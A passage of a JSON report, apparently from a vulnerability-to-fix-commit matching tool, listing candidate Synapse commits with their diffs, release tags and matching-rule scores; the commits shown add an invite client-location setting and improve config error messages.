"v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8935, 8935", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: federation", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8935", + "relevance": 2 + } + ] + }, + { + "commit_id": "56e00ca85e502247112a95ab8c452c83ab5fc4b0", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608307317, + "hunks": 6, + "message": "Send the location of the web client to the IS when inviting via 3PIDs. (#8930) Adds a new setting `email.invite_client_location` which, if defined, is passed to the identity server during invites.", + "diff": [ + "diff --git a/changelog.d/8930.feature b/changelog.d/8930.feature", + "new file mode 100644", + "index 000000000..cb305b526", + "--- /dev/null", + "+++ b/changelog.d/8930.feature", + "@@ -0,0 +1 @@", + "+Add an `email.invite_client_location` configuration option to send a web client location to the invite endpoint on the identity server which allows customisation of the email template.", + "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", + "index 077cb619c..0b4dd115f 100644", + "--- a/docs/sample_config.yaml", + "+++ b/docs/sample_config.yaml", + "@@ -2151,2 +2151,8 @@ email:", + "+ # The web client location to direct users to during an invite. This is passed", + "+ # to the identity server as the org.matrix.web_client_location key. Defaults", + "+ # to unset, giving no guidance to the identity server.", + "+ #", + "+ #invite_client_location: https://app.element.io", + "+", + " # Directory in which Synapse will try to find the template files below.", + "diff --git a/synapse/config/emailconfig.py b/synapse/config/emailconfig.py", + "index 7c8b64d84..d4328c46b 100644", + "--- a/synapse/config/emailconfig.py", + "+++ b/synapse/config/emailconfig.py", + "@@ -324,2 +324,18 @@ class EmailConfig(Config):", + "+ # The invite client location should be a HTTP(S) URL or None.", + "+ self.invite_client_location = email_config.get(\"invite_client_location\") or None", + "+ if self.invite_client_location:", + "+ if not isinstance(self.invite_client_location, str):", + "+ raise ConfigError(", + "+ \"Config option email.invite_client_location must be type str\"", + "+ )", + "+ if not (", + "+ self.invite_client_location.startswith(\"http://\")", + "+ or self.invite_client_location.startswith(\"https://\")", + "+ ):", + "+ raise ConfigError(", + "+ \"Config option email.invite_client_location must be a http or https URL\",", + "+ path=(\"email\", \"invite_client_location\"),", + "+ )", + "+", + " def generate_config_section(self, config_dir_path, server_name, **kwargs):", + "@@ -391,2 +407,8 @@ class EmailConfig(Config):", + "+ # The web client location to direct users to during an invite. This is passed", + "+ # to the identity server as the org.matrix.web_client_location key. Defaults", + "+ # to unset, giving no guidance to the identity server.", + "+ #", + "+ #invite_client_location: https://app.element.io", + "+", + " # Directory in which Synapse will try to find the template files below.", + "diff --git a/synapse/handlers/identity.py b/synapse/handlers/identity.py", + "index 7301c2471..c05036ad1 100644", + "--- a/synapse/handlers/identity.py", + "+++ b/synapse/handlers/identity.py", + "@@ -57,2 +57,4 @@ class IdentityHandler(BaseHandler):", + "+ self._web_client_location = hs.config.invite_client_location", + "+", + " async def threepid_from_creds(", + "@@ -805,2 +807,5 @@ class IdentityHandler(BaseHandler):", + " }", + "+ # If a custom web client location is available, include it in the request.", + "+ if self._web_client_location:", + "+ invite_config[\"org.matrix.web_client_location\"] = self._web_client_location" + ], + "changed_files": [ + "changelog.d/8930.feature", + "docs/sample_config.yaml", + "synapse/config/emailconfig.py", + "synapse/handlers/identity.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8930": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8930, 8930", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: setting, server", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8930", + "relevance": 2 + } + ] + }, + { + "commit_id": "ab7a24cc6bbffa5ba67b42731c45b1d4d33f3ae3", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607436275, + "hunks": 31, + "message": "Better formatting for config errors from modules (#8874) The idea is that the parse_config method of extension modules can raise either a ConfigError or a JsonValidationError, and it will be magically turned into a legible error message. There's a few components to it: * Separating the \"path\" and the \"message\" parts of a ConfigError, so that we can fiddle with the path bit to turn it into an absolute path. * Generally improving the way ConfigErrors get printed. * Passing in the config path to load_module so that it can wrap any exceptions that get caught appropriately.", + "diff": [ + "diff --git a/changelog.d/8874.feature b/changelog.d/8874.feature", + "new file mode 100644", + "index 000000000..720665eca", + "--- /dev/null", + "+++ b/changelog.d/8874.feature", + "@@ -0,0 +1 @@", + "+Improve the error messages printed as a result of configuration problems for extension modules.", + "diff --git a/synapse/app/homeserver.py b/synapse/app/homeserver.py", + "index 2b5465417..bbb740783 100644", + "--- a/synapse/app/homeserver.py", + "+++ b/synapse/app/homeserver.py", + "@@ -21,3 +21,3 @@ import os", + " import sys", + "-from typing import Iterable", + "+from typing import Iterable, Iterator", + "@@ -92,3 +92,3 @@ class SynapseHomeServer(HomeServer):", + " if site_tag is None:", + "- site_tag = port", + "+ site_tag = str(port)", + "@@ -109,3 +109,6 @@ class SynapseHomeServer(HomeServer):", + " for path, resmodule in additional_resources.items():", + "- handler_cls, config = load_module(resmodule)", + "+ handler_cls, config = load_module(", + "+ resmodule,", + "+ (\"listeners\", site_tag, \"additional_resources\", \"<%s>\" % (path,)),", + "+ )", + " handler = handler_cls(config, module_api)", + "@@ -344,3 +347,6 @@ def setup(config_options):", + " except ConfigError as e:", + "- sys.stderr.write(\"\\nERROR: %s\\n\" % (e,))", + "+ sys.stderr.write(\"\\n\")", + "+ for f in format_config_error(e):", + "+ sys.stderr.write(f)", + "+ sys.stderr.write(\"\\n\")", + " sys.exit(1)", + "@@ -447,2 +453,34 @@ def setup(config_options):", + "+def format_config_error(e: ConfigError) -> Iterator[str]:", + "+ \"\"\"", + "+ Formats a config error neatly", + "+", + "+ The idea is to format the immediate error, plus the \"causes\" of those errors,", + "+ hopefully in a way that makes sense to the user. For example:", + "+", + "+ Error in configuration at 'oidc_config.user_mapping_provider.config.display_name_template':", + "+ Failed to parse config for module 'JinjaOidcMappingProvider':", + "+ invalid jinja template:", + "+ unexpected end of template, expected 'end of print statement'.", + "+", + "+ Args:", + "+ e: the error to be formatted", + "+", + "+ Returns: An iterator which yields string fragments to be formatted", + "+ \"\"\"", + "+ yield \"Error in configuration\"", + "+", + "+ if e.path:", + "+ yield \" at '%s'\" % (\".\".join(e.path),)", + "+", + "+ yield \":\\n %s\" % (e.msg,)", + "+", + "+ e = e.__cause__", + "+ indent = 1", + "+ while e:", + "+ indent += 1", + "+ yield \":\\n%s%s\" % (\" \" * indent, str(e))", + "+ e = e.__cause__", + "+", + "+", + " class SynapseService(service.Service):", + "diff --git a/synapse/config/_base.py b/synapse/config/_base.py", + "index 85f65da4d..2931a8820 100644", + "--- a/synapse/config/_base.py", + "+++ b/synapse/config/_base.py", + "@@ -25,3 +25,3 @@ from hashlib import sha256", + " from textwrap import dedent", + "-from typing import Any, Callable, List, MutableMapping, Optional", + "+from typing import Any, Callable, Iterable, List, MutableMapping, Optional", + "@@ -34,3 +34,13 @@ import yaml", + " class ConfigError(Exception):", + "- pass", + "+ \"\"\"Represents a problem parsing the configuration", + "+", + "+ Args:", + "+ msg: A textual description of the error.", + "+ path: Where appropriate, an indication of where in the configuration", + "+ the problem lies.", + "+ \"\"\"", + "+", + "+ def __init__(self, msg: str, path: Optional[Iterable[str]] = None):", + "+ self.msg = msg", + "+ self.path = path", + "diff --git a/synapse/config/_base.pyi b/synapse/config/_base.pyi", + "index b8faafa9b..ed26e2fb6 100644", + "--- a/synapse/config/_base.pyi", + "+++ b/synapse/config/_base.pyi", + "@@ -1,2 +1,2 @@", + "-from typing import Any, List, Optional", + "+from typing import Any, Iterable, List, Optional", + "@@ -37,3 +37,6 @@ from synapse.config import (", + "-class ConfigError(Exception): ...", + "+class ConfigError(Exception):", + "+ def __init__(self, msg: str, path: Optional[Iterable[str]] = None):", + "+ self.msg = msg", + "+ self.path = path", + "diff --git a/synapse/config/_util.py b/synapse/config/_util.py", + "index c74969a97..1bbe83c31 100644", + "--- a/synapse/config/_util.py", + "+++ b/synapse/config/_util.py", + "@@ -40,12 +40,25 @@ def validate_config(", + " except jsonschema.ValidationError as e:", + "- # copy `config_path` before modifying it.", + "- path = list(config_path)", + "- for p in list(e.path):", + "- if isinstance(p, int):", + "- path.append(\"\" % p)", + "- else:", + "- path.append(str(p))", + "-", + "- raise ConfigError(", + "- \"Unable to parse configuration: %s at %s\" % (e.message, \".\".join(path))", + "- )", + "+ raise json_error_to_config_error(e, config_path)", + "+", + "+", + "+def json_error_to_config_error(", + "+ e: jsonschema.ValidationError, config_path: Iterable[str]", + "+) -> ConfigError:", + "+ \"\"\"Converts a json validation error to a user-readable ConfigError", + "+", + "+ Args:", + "+ e: the exception to be converted", + "+ config_path: the path within the config file. This will be used as a basis", + "+ for the error message.", + "+", + "+ Returns:", + "+ a ConfigError", + "+ \"\"\"", + "+ # copy `config_path` before modifying it.", + "+ path = list(config_path)", + "+ for p in list(e.path):", + "+ if isinstance(p, int):", + "+ path.append(\"\" % p)", + "+ else:", + "+ path.append(str(p))", + "+ return ConfigError(e.message, path)", + "diff --git a/synapse/config/oidc_config.py b/synapse/config/oidc_config.py", + "index 69d188341..1abf8ed40 100644", + "--- a/synapse/config/oidc_config.py", + "+++ b/synapse/config/oidc_config.py", + "@@ -68,3 +68,3 @@ class OIDCConfig(Config):", + " self.oidc_user_mapping_provider_config,", + "- ) = load_module(ump_config)", + "+ ) = load_module(ump_config, (\"oidc_config\", \"user_mapping_provider\"))", + "diff --git a/synapse/config/password_auth_providers.py b/synapse/config/password_auth_providers.py", + "index 4fda8ae98..85d07c4f8 100644", + "--- a/synapse/config/password_auth_providers.py", + "+++ b/synapse/config/password_auth_providers.py", + "@@ -38,3 +38,3 @@ class PasswordAuthProviderConfig(Config):", + " providers.extend(config.get(\"password_providers\") or [])", + "- for provider in providers:", + "+ for i, provider in enumerate(providers):", + " mod_name = provider[\"module\"]", + "@@ -47,3 +47,4 @@ class PasswordAuthProviderConfig(Config):", + " (provider_class, provider_config) = load_module(", + "- {\"module\": mod_name, \"config\": provider[\"config\"]}", + "+ {\"module\": mod_name, \"config\": provider[\"config\"]},", + "+ (\"password_providers\", \"\" % i),", + " )", + "diff --git a/synapse/config/repository.py b/synapse/config/repository.py", + "index ba1e9d236..17ce9145e 100644", + "--- a/synapse/config/repository.py", + "+++ b/synapse/config/repository.py", + "@@ -144,3 +144,3 @@ class ContentRepositoryConfig(Config):", + "- for provider_config in storage_providers:", + "+ for i, provider_config in enumerate(storage_providers):", + " # We special case the module \"file_system\" so as not to need to", + "@@ -153,3 +153,5 @@ class ContentRepositoryConfig(Config):", + "- provider_class, parsed_config = load_module(provider_config)", + "+ provider_class, parsed_config = load_module(", + "+ provider_config, (\"media_storage_providers\", \"\" % i)", + "+ )", + "diff --git a/synapse/config/room_directory.py b/synapse/config/room_directory.py", + "index 92e1b6752..9a3e1c3e7 100644", + "--- a/synapse/config/room_directory.py", + "+++ b/synapse/config/room_directory.py", + "@@ -182,3 +182,3 @@ class _RoomDirectoryRule:", + " except Exception as e:", + "- raise ConfigError(\"Failed to parse glob into regex: %s\", e)", + "+ raise ConfigError(\"Failed to parse glob into regex\") from e", + "diff --git a/synapse/config/saml2_config.py b/synapse/config/saml2_config.py", + "index c1b8e98ae..7b97d4f11 100644", + "--- a/synapse/config/saml2_config.py", + "+++ b/synapse/config/saml2_config.py", + "@@ -127,3 +127,3 @@ class SAML2Config(Config):", + " self.saml2_user_mapping_provider_config,", + "- ) = load_module(ump_dict)", + "+ ) = load_module(ump_dict, (\"saml2_config\", \"user_mapping_provider\"))", + "diff --git a/synapse/config/spam_checker.py b/synapse/config/spam_checker.py", + "index 3d067d29d..3d05abc15 100644", + "--- a/synapse/config/spam_checker.py", + "+++ b/synapse/config/spam_checker.py", + "@@ -35,9 +35,10 @@ class SpamCheckerConfig(Config):", + " # to see if the option resolves to a dictionary", + "- self.spam_checkers.append(load_module(spam_checkers))", + "+ self.spam_checkers.append(load_module(spam_checkers, (\"spam_checker\",)))", + " elif isinstance(spam_checkers, list):", + "- for spam_checker in spam_checkers:", + "+ for i, spam_checker in enumerate(spam_checkers):", + "+ config_path = (\"spam_checker\", \"\" % i)", + " if not isinstance(spam_checker, dict):", + "- raise ConfigError(\"spam_checker syntax is incorrect\")", + "+ raise ConfigError(\"expected a mapping\", config_path)", + "- self.spam_checkers.append(load_module(spam_checker))", + "+ self.spam_checkers.append(load_module(spam_checker, config_path))", + " else:", + "diff --git a/synapse/config/third_party_event_rules.py b/synapse/config/third_party_event_rules.py", + "index 10a99c792..c04e1c4e0 100644", + "--- a/synapse/config/third_party_event_rules.py", + "+++ b/synapse/config/third_party_event_rules.py", + "@@ -28,3 +28,5 @@ class ThirdPartyRulesConfig(Config):", + " if provider is not None:", + "- self.third_party_event_rules = load_module(provider)", + "+ self.third_party_event_rules = load_module(", + "+ provider, (\"third_party_event_rules\",)", + "+ )", + "diff --git a/synapse/util/module_loader.py b/synapse/util/module_loader.py", + "index 94b59afb3..1ee61851e 100644", + "--- a/synapse/util/module_loader.py", + "+++ b/synapse/util/module_loader.py", + "@@ -17,10 +17,19 @@ import importlib", + " import importlib.util", + "+import itertools", + "+from typing import Any, Iterable, Tuple, Type", + "+", + "+import jsonschema", + " from synapse.config._base import ConfigError", + "+from synapse.config._util import json_error_to_config_error", + "-def load_module(provider):", + "+def load_module(provider: dict, config_path: Iterable[str]) -> Tuple[Type, Any]:", + " \"\"\" Loads a synapse module with its config", + "- Take a dict with keys 'module' (the module name) and 'config'", + "- (the config dict).", + "+", + "+ Args:", + "+ provider: a dict with keys 'module' (the module name) and 'config'", + "+ (the config dict).", + "+ config_path: the path within the config file. This will be used as a basis", + "+ for any error message.", + "@@ -29,5 +38,12 @@ def load_module(provider):", + " \"\"\"", + "+", + "+ modulename = provider.get(\"module\")", + "+ if not isinstance(modulename, str):", + "+ raise ConfigError(", + "+ \"expected a string\", path=itertools.chain(config_path, (\"module\",))", + "+ )", + "+", + " # We need to import the module, and then pick the class out of", + " # that, so we split based on the last dot.", + "- module, clz = provider[\"module\"].rsplit(\".\", 1)", + "+ module, clz = modulename.rsplit(\".\", 1)", + " module = importlib.import_module(module)", + "@@ -35,6 +51,18 @@ def load_module(provider):", + "+ module_config = provider.get(\"config\")", + " try:", + "- provider_config = provider_class.parse_config(provider.get(\"config\"))", + "+ provider_config = provider_class.parse_config(module_config)", + "+ except jsonschema.ValidationError as e:", + "+ raise json_error_to_config_error(e, itertools.chain(config_path, (\"config\",)))", + "+ except ConfigError as e:", + "+ raise _wrap_config_error(", + "+ \"Failed to parse config for module %r\" % (modulename,),", + "+ prefix=itertools.chain(config_path, (\"config\",)),", + "+ e=e,", + "+ )", + " except Exception as e:", + "- raise ConfigError(\"Failed to parse config for %r: %s\" % (provider[\"module\"], e))", + "+ raise ConfigError(", + "+ \"Failed to parse config for module %r\" % (modulename,),", + "+ path=itertools.chain(config_path, (\"config\",)),", + "+ ) from e", + "@@ -58 +86,25 @@ def load_python_module(location: str):", + " return mod", + "+", + "+", + "+def _wrap_config_error(", + "+ msg: str, prefix: Iterable[str], e: ConfigError", + "+) -> \"ConfigError\":", + "+ \"\"\"Wrap a relative ConfigError with a new path", + "+", + "+ This is useful when we have a ConfigError with a relative path due to a problem", + "+ parsing part of the config, and we now need to set it in context.", + "+ \"\"\"", + "+ path = prefix", + "+ if e.path:", + "+ path = itertools.chain(prefix, e.path)", + "+", + "+ e1 = ConfigError(msg, path)", + "+", + "+ # ideally we would set the 'cause' of the new exception to the original exception;", + "+ # however now that we have merged the path into our own, the stringification of", + "+ # e will be incorrect, so instead we create a new exception with just the \"msg\"", + "+ # part.", + "+", + "+ e1.__cause__ = Exception(e.msg)", + "+ e1.__cause__.__cause__ = e.__cause__", + "+ return e1" + ], + "changed_files": [ + "changelog.d/8874.feature", + "synapse/app/homeserver.py", + "synapse/config/_base.py", + "synapse/config/_base.pyi", + "synapse/config/_util.py", + "synapse/config/oidc_config.py", + "synapse/config/password_auth_providers.py", + "synapse/config/repository.py", + "synapse/config/room_directory.py", + "synapse/config/saml2_config.py", + "synapse/config/spam_checker.py", + "synapse/config/third_party_event_rules.py", + "synapse/util/module_loader.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8874": "Default to the blacklisting reserved IP ranges. #8870" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + 